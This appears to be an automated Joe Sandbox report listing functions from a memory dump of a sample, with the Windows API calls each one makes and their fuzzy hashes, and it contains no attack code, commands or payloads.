Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 458c1a7c18a3e47c85fefa20ca58afbf53070b2e4bf9796c4de56c47d9543ba2
Instruction ID: 7232262fd431368b3778f15c12743b59cdcfdf293c581f019de6132826765503
Opcode Fuzzy Hash: 458c1a7c18a3e47c85fefa20ca58afbf53070b2e4bf9796c4de56c47d9543ba2
Instruction Fuzzy Hash: BD315A70D44228AEFF308B25CC05BFABBA7EB95318F04425EE681522D1C3BA8D819759

Function 00640C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00640C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00640C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00640CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00640D33

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d8da46b7b9c2bf7f4641a8fc244597ab88adc8e98726df735373a0946fc30c00
Instruction ID: 070d76ff2af95c8b1133ca13c71dfea8d035e4bfba112359a2c3af3a3f7e06bb
Opcode Fuzzy Hash: d8da46b7b9c2bf7f4641a8fc244597ab88adc8e98726df735373a0946fc30c00
Instruction Fuzzy Hash: 74315830D40228AEFF308B65DC057FEBB67AF49310F04431EE681522D1C3799D458791

Function 006161C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006161FB
__isleadbyte_l.LIBCMT ref: 00616229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00616257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0061628D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: abd4f69ddc8af25dc73e2ef5e8dc7007f657f2750940aa19f4291bf012a593e1
Instruction ID: 2f64781402f57dab097fd9cc85a446676d5a9a0a6e42bd7739c08591a637f638
Opcode Fuzzy Hash: abd4f69ddc8af25dc73e2ef5e8dc7007f657f2750940aa19f4291bf012a593e1
Instruction Fuzzy Hash: 6F31C034600246BFDB228F65CC45BFA7BAABF42310F194028F864872A1D731DA90D750

Function 00664EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00664F02

Part of subcall function 00643641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0064365B
Part of subcall function 00643641: GetCurrentThreadId.KERNEL32 ref: 00643662
Part of subcall function 00643641: AttachThreadInput.USER32(00000000,?,00645005), ref: 00643669

GetCaretPos.USER32(?), ref: 00664F13
ClientToScreen.USER32(00000000,?), ref: 00664F4E
GetForegroundWindow.USER32 ref: 00664F54

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 5f2e964403d637522b7aa1fcaeab671a0e7710b99d72a0701f1765910c9ebc6c
Instruction ID: 1189f5d628953e52fcfb9c80762d199e87055cbd7f07a7d748c55de75be1337a
Opcode Fuzzy Hash: 5f2e964403d637522b7aa1fcaeab671a0e7710b99d72a0701f1765910c9ebc6c
Instruction Fuzzy Hash: 6C313EB1D00109AFCB04EFA6C8859EFBBFDEF98300F10406AE455E7211DA719E058BA1

Function 0066C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

GetCursorPos.USER32(?), ref: 0066C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0061B9AB,?,?,?,?,?), ref: 0066C4E7
GetCursorPos.USER32(?), ref: 0066C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0061B9AB,?,?,?), ref: 0066C56E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4ad48e2a40d10897eaa5ffd1ce742de5c39831fe8db8c4a5ecfec2541cc45ee2
Instruction ID: fc09b9665e2f470c9cb7c577078e08056f68c254feee42cdd8f12520df474762
Opcode Fuzzy Hash: 4ad48e2a40d10897eaa5ffd1ce742de5c39831fe8db8c4a5ecfec2541cc45ee2
Instruction Fuzzy Hash: AC31BF35600558AFCB15DF58CC58EFA7BBAEB49320F444069F9468B361CB31AD60DFA4

Function 00638656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0063810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00638121
Part of subcall function 0063810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0063812B
Part of subcall function 0063810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063813A
Part of subcall function 0063810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00638141
Part of subcall function 0063810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00638157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006386A3
_memcmp.LIBCMT ref: 006386C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006386FC
HeapFree.KERNEL32(00000000), ref: 00638703

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: ebc53f14a2988896cf68c65ccd83e7660d9ac4f62c61f9457a479c76cfdc87fc
Instruction ID: 52bdad3c217a80a6d92e9abd6eedd6274229dce0daa803c8e0bff594c0e85c97
Opcode Fuzzy Hash: ebc53f14a2988896cf68c65ccd83e7660d9ac4f62c61f9457a479c76cfdc87fc
Instruction Fuzzy Hash: C2219D71E40209EFDB10DFA4C95ABEEB7FAEF56304F154099E444AB240DB71AE05CB90

Function 0060098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 006009AE

Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50

_fprintf.LIBCMT ref: 006009E5
OutputDebugStringW.KERNEL32(?), ref: 00635DBB

Part of subcall function 00604AAA: _flsall.LIBCMT ref: 00604AC3

__setmode.LIBCMT ref: 00600A1A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: a04da806f54eab987a22c3228a124104a1393fab8e57c96638792193176297ff
Instruction ID: a0e22b35ec806a39dcede1ac623b824c63d53f1ae343e56dcb64de0840301705
Opcode Fuzzy Hash: a04da806f54eab987a22c3228a124104a1393fab8e57c96638792193176297ff
Instruction Fuzzy Hash: C8112771A882456FD75CB7B59C8A9FF7B6BAF81320F100019F205572D3FE20594297E9

Function 00651767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006517A3

Part of subcall function 0065182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0065184C
Part of subcall function 0065182D: InternetCloseHandle.WININET(00000000), ref: 006518E9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: c9d3a2aa5a2b27473c7e2d138daaadd933de0652bfa8b392ad7a2332bd8f1de7
Instruction ID: bc9905adb3412c936db787972874e0311480c1ce95f39498502635170175bd53
Opcode Fuzzy Hash: c9d3a2aa5a2b27473c7e2d138daaadd933de0652bfa8b392ad7a2332bd8f1de7
Instruction Fuzzy Hash: F8218035200605BBEB269F64DC01FBABBEBFB4A712F10402AFD119A650DB71981597A4

Function 00643A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0066FAC0), ref: 00643A64
GetLastError.KERNEL32 ref: 00643A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00643A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0066FAC0), ref: 00643ADF

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c1f0eb35e38aea886cc07197cdd35ad7d5c63e69810b1ba7944e3a2d698f4e60
Instruction ID: 8f743f83943a291c42c2c65039c799283f5f2ba062d61ccd2f4ba088dce725bf
Opcode Fuzzy Hash: c1f0eb35e38aea886cc07197cdd35ad7d5c63e69810b1ba7944e3a2d698f4e60
Instruction Fuzzy Hash: 7421A3745482159F8300DF28D8858AA7BEAFF59364F105A2DF4D9C73A1D731DE46CB82

Function 006150E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00615101

Part of subcall function 0060571C: __FF_MSGBANNER.LIBCMT ref: 00605733
Part of subcall function 0060571C: __NMSG_WRITE.LIBCMT ref: 0060573A
Part of subcall function 0060571C: RtlAllocateHeap.NTDLL(00F40000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cecf45374facfcdef604339b8b2076a95839fc52283d90e0b5c7af5409fb6984
Instruction ID: 11b74a901ff4bf6bda89d16c9c88bb072eca560563fe4a57ae3a4783f9300c58
Opcode Fuzzy Hash: cecf45374facfcdef604339b8b2076a95839fc52283d90e0b5c7af5409fb6984
Instruction Fuzzy Hash: 1C110172540A11FFCB262F70AC467DF779BAF913A1B14052EF94696390DF348C808688

Function 00656369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50

gethostbyname.WSOCK32(?,?,?), ref: 00656399
WSAGetLastError.WSOCK32(00000000), ref: 006563A4
_memmove.LIBCMT ref: 006563D1
inet_ntoa.WSOCK32(?), ref: 006563DC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 19d38d4d343187d2f81c013cf55d509af82d3eb4ab28ae9ffd4710a4705218d0
Instruction ID: 5e8a933f1d46428c8110cdc96332c05d3a175b366327ee18c54f2ebf140f9f2e
Opcode Fuzzy Hash: 19d38d4d343187d2f81c013cf55d509af82d3eb4ab28ae9ffd4710a4705218d0
Instruction Fuzzy Hash: EE11863150010AAFCB04FFA5DD4ACEE7BBABF54315B544079F505A7161DB309E14CB61

Function 00638B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00638B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638BA4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a9650a32bf6b191a5727e6d0eac76b87fdec9164d89a40a908a3051c5326a21b
Instruction ID: d51eccf0317e6c52284dc0b1d4dfe3676954c6744d991c74e6b2eb1bb2c1f173
Opcode Fuzzy Hash: a9650a32bf6b191a5727e6d0eac76b87fdec9164d89a40a908a3051c5326a21b
Instruction Fuzzy Hash: B2113679900219BFEB11DBA5C884EEDFBB9EB48310F2040A5EA00B7290DA716E11DB94

Function 005E1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

DefDlgProcW.USER32(?,00000020,?), ref: 005E12D8
GetClientRect.USER32(?,?), ref: 0061B5FB
GetCursorPos.USER32(?), ref: 0061B605
ScreenToClient.USER32(?,?), ref: 0061B610

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: f913d925db26e60436355e51bbd5305e2c190cfbeb814dd65493a2e8c879bd3a
Instruction ID: 8f499a4c50ce210d22218813b99c1b9a9984e170b042d13cfd3fd0e0f8ef542b
Opcode Fuzzy Hash: f913d925db26e60436355e51bbd5305e2c190cfbeb814dd65493a2e8c879bd3a
Instruction Fuzzy Hash: 00113A3950045AEFCB04EFAADC899FE7BB9FB45300F400455FA52E7241C770BA518BA9

Function 0063D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0063D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0063D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0063D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0063D897

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4eb45e3624392e58cdd784603dac81b17c1298d2e9477fb9e548740cd1007983
Instruction ID: c4c03dea8f7176e4e9c540082ea2ec831595aa2411cb79f18a3c1105d81077ac
Opcode Fuzzy Hash: 4eb45e3624392e58cdd784603dac81b17c1298d2e9477fb9e548740cd1007983
Instruction Fuzzy Hash: 781139B5A05304EBE3208F51FC48F92BBAAEB00B00F108569EA16D7591D7F0F9499BE1

Function 00616FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00616FDB

Part of subcall function 006176C2: __fltout2.LIBCMT ref: 006176EB

__cftog_l.LIBCMT ref: 00617001
__cftoe_l.LIBCMT ref: 00617033

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 674b296d9544ad600e0854ec1e0f9f1599ce9bccdc6242cff05bb30f9bf9def1
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 84014E7644824ABFCF165E84CC05CED3F73BB1C395F598415FA1899131D236CAB1AB81

Function 0066B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0066B2E4
ScreenToClient.USER32(?,?), ref: 0066B2FC
ScreenToClient.USER32(?,?), ref: 0066B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0066B33B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 66740dc8be85a3e8eab87a4110a56a15cb6ccf1c15cd26afb5e1e6560e48c724
Instruction ID: 7d8651804605e9cc4917021048380c5c97cc0aadd5a8337a808c6c3a94c5db53
Opcode Fuzzy Hash: 66740dc8be85a3e8eab87a4110a56a15cb6ccf1c15cd26afb5e1e6560e48c724
Instruction Fuzzy Hash: 631143B9D00209EFDB41CFA9D8849EEBBB9FB08310F109166E914E3220D775AA658F50

Function 00646BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00646BE6

Part of subcall function 006476C4: _memset.LIBCMT ref: 006476F9

_memmove.LIBCMT ref: 00646C09
_memset.LIBCMT ref: 00646C16
LeaveCriticalSection.KERNEL32(?), ref: 00646C26

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 969ac46c8b93bb91fde8b2c3a68f914f2ba6fc6eb1728492236181fb686966a4
Instruction ID: 4a1c2043a5344fb9e5a7bae310d2b895ffcfb890fff11daa1239c428006d505e
Opcode Fuzzy Hash: 969ac46c8b93bb91fde8b2c3a68f914f2ba6fc6eb1728492236181fb686966a4
Instruction Fuzzy Hash: 99F03A3A200100ABCF456F95EC95A8ABB2AEF45321F048065FE086E266D771A911CBB8

Function 005E2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 005E2231
SetTextColor.GDI32(?,000000FF), ref: 005E223B
SetBkMode.GDI32(?,00000001), ref: 005E2250
